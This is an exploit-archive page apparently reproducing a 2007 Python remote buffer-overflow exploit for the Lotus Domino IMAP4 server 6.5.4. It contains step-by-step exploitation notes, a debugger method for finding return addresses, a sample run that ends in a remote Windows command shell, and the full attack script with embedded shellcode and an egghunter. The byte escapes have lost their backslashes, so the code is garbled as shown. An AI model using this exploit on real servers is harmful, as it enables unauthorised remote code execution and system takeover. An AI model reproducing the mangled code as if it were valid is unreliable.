[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Lotus Domino IMAP4 Server 6.5.4 Remote Buffer Overflow Exploit
# Published : 2007-07-20
# Author : dmc and prdelka
# Previous Title : Data Dynamics ActiveReport ActiveX (actrpt2.dll <= 2.5) Inscure Method
# Next Title : Versalsoft HTTP File Uploader AddFile() Remote Buffer Overflow Exploit
###########################################################################################
# Lotus Domino IMAP4 Server Release 6.5.4 / Windows 2000 Advanced Server x86 Remote Exploit
###########################################################################################
# Vulnerable: IBM Lotus Domino <= 7.0.2 && 6.5.5 FP2 (tested 6.5.4)
# Authors: Dominic Chell <dmc@digitalapocalypse.net> & prdelka
#
# Exploitation steps:
# 1) The instruction "call dword [ecx]" is performed with user supplied ECX
# 2) EAX reference our buffer from retaddr onward
# 3) we put pointer in ECX to a pointer referencing "call eax"
# 4) a small payload decrements eax and then jmp's into the eax buffer due
# to size limitations.
# 5) our larger payload is then executed.
#
# muts exploit would not work for us, his egghunt uses 0x2e which is converted
# to 0x09 (.'s to [tab]'s) and his return address was not found on our test
# environment.
#
# Finding a Target:
# To find a target, attach a debugger to nimap.exe, cause the application
# to crash. Then use search function to find "call eax" or equivilant
# instruction in memory. Then, take the pointer to eax, such as "0x77ff1122"
# and search for another location in memory that has "0x11 0xff 0x77". This
# will be utilised for a return address if no instruction modify eax or
# subvert execution to another place in memory.
#
# Thanks to: nemo, hdm, jf, Winny Thomas, muts
#
###########################################################################################
# Note: it takes a few minutes for the egghunter to find the payload in memory
#
# For example:
# C:workexploitsimap>poc.py
# [*] sending payload
# [*] sending payload
# [*] sending payload
# [*] sending payload
# * OK Domino IMAP4 Server Release 6.5.4 ready Tue, 26 Jun 2007 15:18:36 +0100
#
# PDAwNEU5QkNCLjgwMjU3MzA2LjAwMDAwOUY4LjAwMDAwMDA5QERNQz4=
#
# sending...
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkNvS2XQk9FgpybEKu3E1If4xWBcDWBeDmcnDC2rgYnVG+2Q3
# BG5572VAQQov6VasmyGZmqi4dlFEk/x9Zwv0gcDrZXeQkJCD6FKD6FKD6FL/4CB4OcnLXAvHq421
# M2iR5FFG
#
#
# C:workexploitsimap>nc -vv 192.168.126.130 4444
# 2KVM-DC [192.168.126.130] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-1999 Microsoft Corp.
#
# E:LotusDomino>
#
###########################################################################################
import socket, struct, md5, base64, sys, string, signal, getopt
class Exp_Lotus:
def __init__(self):
self.host='127.0.0.1'
self.port=143
def send_payload(host,port):
payload ="x54x30x30x57x54x30x30x57"
payload += ("x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xf7"
"x82xf8x80x83xebxfcxe2xf4x0bxe8x13xcdx1fx7bx07x7f"
"x08xe2x73xecxd3xa6x73xc5xcbx09x84x85x8fx83x17x0b"
"xb8x9ax73xdfxd7x83x13xc9x7cxb6x73x81x19xb3x38x19"
"x5bx06x38xf4xf0x43x32x8dxf6x40x13x74xccxd6xdcxa8"
"x82x67x73xdfxd3x83x13xe6x7cx8exb3x0bxa8x9exf9x6b"
"xf4xaex73x09x9bxa6xe4xe1x34xb3x23xe4x7cxc1xc8x0b"
"xb7x8ex73xf0xebx2fx73xc0xffxdcx90x0exb9x8cx14xd0"
"x08x54x9exd3x91xeaxcbxb2x9fxf5x8bxb2xa8xd6x07x50"
"x9fx49x15x7cxccxd2x07x56xa8x0bx1dxe6x76x6fxf0x82"
"xa2xe8xfax7fx27xeax21x89x02x2fxafx7fx21xd1xabxd3"
"xa4xd1xbbxd3xb4xd1x07x50x91xeaxe9xdcx91xd1x71x61"
"x62xeax5cx9ax87x45xafx7fx21xe8xe8xd1xa2x7dx28xe8"
"x53x2fxd6x69xa0x7dx2exd3xa2x7dx28xe8x12xcbx7exc9"
"xa0x7dx2exd0xa3xd6xadx7fx27x11x90x67x8ex44x81xd7"
"x08x54xadx7fx27xe4x92xe4x91xeax9bxedx7ex67x92xd0"
"xaexabx34x09x10xe8xbcx09x15xb3x38x73x5dx7cxbaxad"
"x09xc0xd4x13x7axf8xc0x2bx5cx29x90xf2x09x31xeex7f"
"x82xc6x07x56xacxd5xaaxd1xa6xd3x92x81xa6xd3xadxd1"
"x08x52x90x2dx2ex87x36xd3x08x54x92x7fx08xb5x07x50"
"x7cxd5x04x03x33xe6x07x56xa5x7dx28xe8x07x08xfcxdf"
"xa4x7dx2ex7fx27x82xf8x80")
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
d=s.recv(1024)
print "[*] sending payload"
s.send('a001 admin ' + payload + 'rn')
d=s.recv(1024)
s.close()
except:
"Can't connect to IMAP server"
def usage():
print sys.argv[0] + "nntLotus Domino 6.5.4 Windows 2000 Advanced Server x86 Exploitntauthor: dmc@digitalapocalypse.net & prdelka"
print "t-h host"
print "t-p port"
sys.exit(2)
def signal_handler(signal, frame):
print 'err: caught sigint, exiting'
sys.exit(0)
def exp(host, port):
buffer = "x90" * 193
buffer += ("xdbxd2xd9x74x24xf4x58x29xc9xb1x0axbbx71x35x21"
"xfex31x58x17x03x58x17x83x99xc9xc3x0bx6axe0x62"
"x75x46xfbx64x37x04x6ex79xefx65x40x41x0ax2fxe9"
"x56xacx9bx21x99x9axa8xb8x76x51x44x93xfcx7dx67"
"x0bxf4x81")
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
d=s.recv(1024)
print d
s.send('a001 authenticate cram-md5rn')
d=s.recv(1024)
d=d[2:1022].strip()
print d
m=md5.new()
m.update(d)
digest = m.digest()
buffer += struct.pack('<L', 0x7765ebc0) # call eax 6014DC6E (ptr to 6014DC68)
buffer += "x90x90x90x83xE8x52x83xE8x52x83xE8x52xFFxE0"
buffer = buffer + ' ' + digest
s.send(base64.encodestring(buffer) + 'rn')
print "nsending...n", base64.encodestring(buffer) , 'rn'
except:
"Can't connect to IMAP server"
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
if not argv:
usage()
try:
opts, args = getopt.getopt(argv, 'h:p:')
except getopt.GetoptError:
usage()
signal.signal(signal.SIGINT, signal_handler)
ex = Exp_Lotus()
for o, a in opts:
if o == '-h': ex.host=a.strip()
elif o =='-p': ex.port = int(a)
host = ex.host
port = ex.port
send_payload(host,port)
send_payload(host,port)
send_payload(host,port)
send_payload(host,port)
exp(host, port)
if __name__ == '__main__':
main()
# www.Syue.com [2007-07-20]